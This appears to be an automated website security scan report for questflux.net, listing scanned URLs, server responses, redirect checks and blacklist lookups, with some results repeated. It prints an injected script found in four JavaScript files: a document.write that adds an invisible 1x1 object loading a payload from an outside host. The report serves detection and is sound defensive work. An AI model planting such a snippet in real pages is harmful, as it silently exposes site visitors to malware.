Scanned pages/files
Request | Server response | Status |
http://questflux.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 31 Aug 2014 17:34:20 GMT Location: http://www.questflux.net/en/start Server: Apache Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.questflux.net/en/start | 200 OK Content-Length: 10048 Content-Type: text/html | clean |
http://5.45.179.182/script.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://5.45.179.182/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://multfilm-online-stuio.ru/script.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://questflux.net/questflux.js | 404 Not Found Content-Length: 2255 Content-Type: text/html | clean |
http://questflux.net/account.js | 404 Not Found Content-Length: 2255 Content-Type: text/html | clean |
http://questflux.net/en/register | 200 OK Content-Length: 4983 Content-Type: text/html | clean |
http://questflux.net/en/questflux.js | 200 OK Content-Length: 14657 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<object data="http://carmejuan.com/rjl4gvwq.php?id=2945889" type="image/svg+xml" width="1" height="1"><embed src="http://carmejuan.com/rjl4gvwq.php?id=2945889" type="image/svg+xml" pluginspage="http://www.adobe.com/svg/viewer/install/" width="1" height="1"></object>');
| ||
http://questflux.net/en/account.js | 200 OK Content-Length: 7531 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<object data="http://carmejuan.com/rjl4gvwq.php?id=2945879" type="image/svg+xml" width="1" height="1"><embed src="http://carmejuan.com/rjl4gvwq.php?id=2945879" type="image/svg+xml" pluginspage="http://www.adobe.com/svg/viewer/install/" width="1" height="1"></object>');
| ||
http://questflux.net/en/detail.js | 200 OK Content-Length: 14509 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<object data="http://carmejuan.com/rjl4gvwq.php?id=2945883" type="image/svg+xml" width="1" height="1"><embed src="http://carmejuan.com/rjl4gvwq.php?id=2945883" type="image/svg+xml" pluginspage="http://www.adobe.com/svg/viewer/install/" width="1" height="1"></object>');
| ||
http://questflux.net/en/md5.js | 200 OK Content-Length: 9888 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<object data="http://carmejuan.com/rjl4gvwq.php?id=2945887" type="image/svg+xml" width="1" height="1"><embed src="http://carmejuan.com/rjl4gvwq.php?id=2945887" type="image/svg+xml" pluginspage="http://www.adobe.com/svg/viewer/install/" width="1" height="1"></object>');
| ||
http://questflux.net/en/login | 200 OK Content-Length: 4705 Content-Type: text/html | clean |
http://questflux.net/en/account | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 17:34:39 GMT Pragma: no-cache Location: start Server: Apache Content-Length: 620 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6nf99q2ho5jv0mv641em4kvjb0; path=/ | clean |
http://questflux.net/en/start | 200 OK Content-Length: 10048 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21259 Content-Type: text/javascript | clean |
http://questflux.net/de/start | 200 OK Content-Length: 2075 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: questflux.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 31 Aug 2014 17:34:20 GMT
Location: http://www.questflux.net/en/start
Server: Apache
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
GET / HTTP/1.1
Host: questflux.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 31 Aug 2014 17:34:20 GMT
Location: http://www.questflux.net/en/start
Server: Apache
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: questflux.net
Referer: http://www.google.com/search?q=questflux.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: questflux.net
Referer: http://www.google.com/search?q=questflux.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=questflux.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://questflux.net/
Result: questflux.net is not infected or malware details are not published yet.
Result: questflux.net is not infected or malware details are not published yet.